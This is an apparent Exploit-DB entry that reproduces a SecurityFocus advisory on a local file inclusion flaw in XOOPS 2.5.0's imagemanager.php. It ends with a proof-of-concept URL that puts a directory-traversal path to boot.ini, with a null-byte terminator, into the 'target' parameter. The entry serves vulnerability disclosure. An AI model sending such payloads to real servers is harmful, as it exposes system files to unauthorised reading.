XOOPS 2.5 - 'imagemanager.php' Local File Inclusion

EDB-ID:

35632

CVE:

N/A




Platform:

PHP

Date:

2011-04-18


source: https://www.securityfocus.com/bid/47418/info

XOOPS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view arbitrary local files within the context of the webserver process. Successfully exploiting this issue may lead to other attacks.

XOOPS 2.5.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/imagemanager.php?target=/../../../../../../../../boot.ini%00&op=upload